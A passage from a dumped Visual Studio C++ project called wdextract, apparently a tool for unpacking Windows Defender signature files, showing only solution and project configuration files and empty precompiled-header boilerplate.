{08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {DB1C4BA6-54B6-4E86-9651-1D868FC12E74} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /source/wdextract/wdextract/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to pre-compiled header; necessary for 
compilation to succeed 2 | 3 | #include "pch.h" 4 | 5 | // In general, ignore this file, but keep it around if you are using pre-compiled headers. 6 | -------------------------------------------------------------------------------- /source/wdextract/wdextract/pch.h: -------------------------------------------------------------------------------- 1 | // Tips for Getting Started: 2 | // 1. Use the Solution Explorer window to add/manage files 3 | // 2. Use the Team Explorer window to connect to source control 4 | // 3. Use the Output window to see build output and other messages 5 | // 4. Use the Error List window to view errors 6 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 7 | // 6. In the future, to open this project again, go to File > Open > Project and select the .sln file 8 | 9 | #ifndef PCH_H 10 | #define PCH_H 11 | 12 | // TODO: add headers that you want to pre-compile here 13 | 14 | #endif //PCH_H 15 | -------------------------------------------------------------------------------- /source/wdextract/wdextract/wdextract.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | Source Files 28 | 29 | 30 | -------------------------------------------------------------------------------- /source/wdextract/wdextract/wdextract.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | C:\wdbase\mpasbase.dll 5 | WindowsLocalDebugger 6 | 7 | 8 | 
c:\wdbase\mpavbase.vdm 9 | WindowsLocalDebugger 10 | 11 | 12 | C:\wdbase\mpasbase.dll 13 | WindowsLocalDebugger 14 | 15 | -------------------------------------------------------------------------------- /source/wdextract/wdextract/zlibwapi.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/wdextract/wdextract/zlibwapi.lib --------------------------------------------------------------------------------